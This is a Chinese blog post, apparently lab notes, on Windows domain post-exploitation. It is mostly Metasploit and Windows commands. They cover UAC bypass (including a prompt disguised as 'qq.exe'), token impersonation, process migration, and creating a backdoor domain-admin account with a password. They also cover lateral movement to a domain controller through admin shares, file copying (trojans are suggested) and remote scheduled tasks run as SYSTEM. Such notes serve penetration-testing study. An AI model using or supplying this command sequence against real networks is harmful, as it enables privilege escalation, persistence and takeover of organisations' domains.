域安全（2）横向移动和纵向移动以及域的提权（后渗透）

域安全-UAC提权 需要UAC提权进行的操作：（基本在控制面板） 1.系统的更新 2.增加/修改账户 3.修改UAC设置等 借助msf
1.已经通过木马使目标计算机被控制 成功上线 2.进行UAC提权尝试（失败率比较高） use exploit/windows/local/bypassuac
(多用来进攻32位系统) show options set SESSION 1   //具体是几号机器就填相应的数字 exploit 开始攻击/run也可以执行
//如果攻击成功，会给你一个新的session号 进入新的session号 getuid getsystem ask模块进行uac提权 background
先把木马放到后台 use exploit/windows/local/ask 加载ask模块 info 查看漏洞信息 set SESSION
1    //使用漏洞在1号木马控制的目标上 set FILENAME   qq.exe   //伪装成文件名为qq set LHOST
[本地的ip地址]    //设置本地监听地址 exploit 会在用户桌面上弹出一个允许qq启动，用户选择yes，成功
getuid     //发现还不是system getsystem  //可以提高到最高 域安全-令牌窃取 纵向移动 横向移动 令牌-token 
更类似于web安全中的cookie 伪造令牌 可以实现提权 也就是纵向移动提权方法的一种 核心：kerberos协议 借助工具msf 步骤：
1.木马成功使目标计算机上线 2.进入一个session  use incognito list_tokens -u impersonate_token
TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个) //Successfully shell 
//即可获得冒用的相应的执行权限 whoami 纵向移动（这里介绍一种进程迁移注入的提权方法） (移动到哪个进程 就可以以哪个进程的名义
做该进程持有者相应权限的事情) 1.首先不论任何手段获得system权限 此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上
2.进程迁移提权 migrate [相应进程的pid]   //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似
TEST1\Administrator 域管理员的权限 get uid  //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限
3.令牌伪造提权： （这一步下才可以执行add_user命令） （也就是上面的伪造令牌 这里重复介绍一下） use incognito list_tokens
-u impersonate_token TEST1\\Administrator 3.后续操作 （纵向移动提权成功以后的横向移动以及后渗透）
#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址] add_user lyj Test123 -h
192.168.109.136 add_group_user "domain admins" lyj -h 192.168.109.136 shell net
group "domain admins"   //只能在域控制器上使用的命令 横向移动（纵向移动提权成功以后的情况下的横向移动） 1.使用纵向移动的方法
不论使用了哪种提权方法 这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj
2.默认情况下域控windows会开放c盘的共享 方法1： 进入网络驱动器的映射 3.点击完成 登录刚才建立的新的管理员账户 方法2：命令行操作 net
use \\192.168.109.136\c$ "Test123" /user:lyj net share net use dir
\\192.168.109.136\c$ type \\192.168.109.136\c$\a.txt 方法2-2： 当对方 开启了135 445端口
时可以使用ipc$  或者管理员什么都没有修改那么可以使用ipc$  可以使用的权限更高 net use \\192.168.109.136\ipc$
"Test123" /user:lyj net use 方法2-3： 远程访问（以远程访问进程为例） tasklist /S
192.168.109.136 /U lyj /P Test123 方法2-4： 在内网被控制的机器的C盘创建一个文本文件a.txt 然后cmd执行命令 
可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了 copy a.txt \\192.168.109.136\c$
方法2-5：计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内 at \\192.168.109.136 9:51PM cmd.exe /c
"ipconfig > c:/1.txt"  方法2-6：针对比较新的系统 schtasks /create /s 192.168.109.136 /tn
test1 /sc onstart /tr c:/a.bat /ru system /f

• « 上一篇：2021第十二届蓝桥杯Python组
• » 下一篇：几句话说清session，cookie和token的区别